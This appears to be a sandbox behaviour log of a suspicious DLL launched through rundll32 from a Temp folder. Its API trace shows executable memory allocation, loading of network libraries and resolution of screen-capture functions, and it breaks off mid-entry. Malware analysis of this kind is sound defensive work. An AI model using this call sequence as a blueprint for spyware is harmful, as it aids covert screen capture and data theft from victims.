"\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1395 start_va = 0x830000 end_va = 0x85ffff entry_point = 0x830000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1396 start_va = 0x5b0000 end_va = 0x5b3fff entry_point = 0x5b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1397 start_va = 0x17c0000 end_va = 0x1825fff entry_point = 0x17c0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1398 start_va = 0x1910000 end_va = 0x1d02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001910000" filename = "" Region: id = 1399 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1400 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Thread: id = 26 os_tid = 0xae8 [0044.875] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0044.875] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.875] GetLastError () returned 0x57 [0044.875] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.876] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.877] GetLastError () returned 0x57 [0044.877] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76590000 [0044.877] GetProcAddress (hModule=0x76590000, lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0044.877] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.877] GetLastError () returned 0x57 [0044.877] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.877] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0044.877] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0044.878] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.878] GetLastError () returned 0x57 [0044.878] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.878] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.878] GetLastError () returned 0x57 [0044.878] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76590000 [0044.878] GetProcAddress (hModule=0x76590000, lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0044.879] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.879] GetLastError () returned 0x57 [0044.879] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.879] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0044.879] GetLastError () returned 0x7e [0044.879] GetProcAddress (hModule=0x76590000, lpProcName="FlsGetValue") returned 0x765e1e16 [0044.879] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0044.880] SetLastError (dwErrCode=0x7e) [0044.881] GetStartupInfoW (in: lpStartupInfo=0xef020 | out: lpStartupInfo=0xef020*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5ef18a30, hStdOutput=0x10404f9, hStdError=0xfffffffe)) [0044.881] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0044.881] GetFileType (hFile=0x3) returned 0x0 [0044.881] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0044.881] GetFileType (hFile=0x7) returned 0x0 [0044.881] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0044.881] GetFileType (hFile=0xb) returned 0x0 [0044.881] GetCommandLineA () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK" [0044.881] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK" [0044.881] GetLastError () returned 0x6 [0044.881] SetLastError (dwErrCode=0x6) [0044.881] GetLastError () returned 0x6 [0044.881] SetLastError (dwErrCode=0x6) [0044.881] GetACP () returned 0x4e4 [0044.881] IsValidCodePage (CodePage=0x4e4) returned 1 [0044.881] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xef050 | out: lpCPInfo=0xef050) returned 1 [0044.881] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xee918 | out: lpCPInfo=0xee918) returned 1 [0044.881] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0xee6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⎙廲Ā") returned 256 [0044.882] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⎙廲Ā", cchSrc=256, lpCharType=0xee92c | out: lpCharType=0xee92c) returned 1 [0044.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0xee668, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿラ廱Ā") returned 256 [0044.882] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0044.882] GetLastError () returned 0x57 [0044.882] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0044.882] GetProcAddress (hModule=0x76590000, lpProcName="LCMapStringEx") returned 0x7661f72b [0044.882] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿラ廱Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0044.882] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿラ廱Ā", cchSrc=256, lpDestStr=0xee458, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0044.882] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0xeee2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿaðù_hð\x0e", lpUsedDefaultChar=0x0) returned 256 [0044.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0044.882] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xeef2c, cbMultiByte=256, lpWideCharStr=0xee688, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0044.882] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0044.882] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0xee478, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0044.882] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0xeed2c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿaðù_hð\x0e", lpUsedDefaultChar=0x0) returned 256 [0044.882] RtlInitializeSListHead (in: ListHead=0x5ef33f50 | out: ListHead=0x5ef33f50) [0044.883] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0044.883] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5ef34040, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe")) returned 0x20 [0044.883] GetEnvironmentStringsW () returned 0x2937b0* [0044.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1204, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1204 [0044.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1204, lpMultiByteStr=0x294120, cbMultiByte=1204, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1204 [0044.883] FreeEnvironmentStringsW (penv=0x2937b0) returned 1 [0044.884] LoadLibraryA (lpLibFileName="Shlwapi") returned 0x76b40000 [0044.885] LoadLibraryA (lpLibFileName="Shell32") returned 0x758a0000 [0044.887] LoadLibraryA (lpLibFileName="Advapi32") returned 0x764f0000 [0044.993] HOK () returned 0x0 [0044.993] GetModuleFileNameA (in: hModule=0x5ef10000, lpFilename=0xef434, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll")) returned 0x2d [0044.993] IsUserAnAdmin () returned 0 [0044.993] GetSystemDirectoryA (in: lpBuffer=0xef330, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.993] VirtualAlloc (lpAddress=0x0, dwSize=0x262c, flAllocationType=0x1000, flProtect=0x40) returned 0x160000 [0044.994] GetProcAddress (hModule=0x76590000, lpProcName="LoadLibraryA") returned 0x765e395c [0044.994] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x773f0000 [0044.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x764f0000 [0044.995] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76890000 [0044.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x758a0000 [0044.996] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0045.007] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76960000 [0045.011] LoadLibraryA (lpLibFileName="version.dll") returned 0x74940000 [0045.013] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x76840000 [0045.013] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77140000 [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="FreeLibrary") returned 0x765dd9d0 [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="ReadFile") returned 0x765d96fb [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0045.013] GetProcAddress (hModule=0x76590000, lpProcName="GetFileSize") returned 0x765d0273 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="VirtualAlloc") returned 0x765e2fb6 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="HeapAlloc") returned 0x772f2dd6 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="GlobalReAlloc") returned 0x765cec90 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="VirtualFree") returned 0x765e1da4 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="VirtualProtect") returned 0x765d2341 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="HeapFree") returned 0x765dbbd0 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="GetProcessHeap") returned 0x765e1280 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="IsBadReadPtr") returned 0x765cb6a3 [0045.014] GetProcAddress (hModule=0x76590000, lpProcName="GetNativeSystemInfo") returned 0x765cbe77 [0045.015] GetProcAddress (hModule=0x76590000, lpProcName="OutputDebugStringA") returned 0x765ceb36 [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="CreateDCA") returned 0x7684cca9 [0045.015] GetProcAddress (hModule=0x76890000, lpProcName="IsRectEmpty") returned 0x768a561e [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="CreateCompatibleDC") returned 0x76846888 [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="GetDeviceCaps") returned 0x76846f7f [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="CreateCompatibleBitmap") returned 0x768473ad [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="SelectObject") returned 0x76846640 [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="BitBlt") returned 0x768472c0 [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="DeleteDC") returned 0x76846eaa [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="GetObjectA") returned 0x7684914f [0045.015] GetProcAddress (hModule=0x76590000, lpProcName="GlobalAlloc") returned 0x765d9ce1 [0045.015] GetProcAddress (hModule=0x76590000, lpProcName="GlobalLock") returned 0x765d9e05 [0045.015] GetProcAddress (hModule=0x76840000, lpProcName="GetStockObject") returned 0x76845ddf [0045.016] GetProcAddress (hModule=0x76890000, lpProcName="GetDC") returned 0x768a544c [0045.016] GetProcAddress (hModule=0x76840000, lpProcName="SelectPalette") returned 0x7684a1f6 [0045.016] GetProcAddress (hModule=0x76840000, lpProcName="RealizePalette") returned 0x7684ef91 [0045.016] GetProcAddress (hModule=0x76840000, lpProcName="GetDIBits") returned 0x7684a23b [0045.016] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseDC") returned 0x768a5421 [0045.016] GetProcAddress (hModule=0x76590000, lpProcName="WriteFile") returned 0x765e1400 [0045.016] GetProcAddress 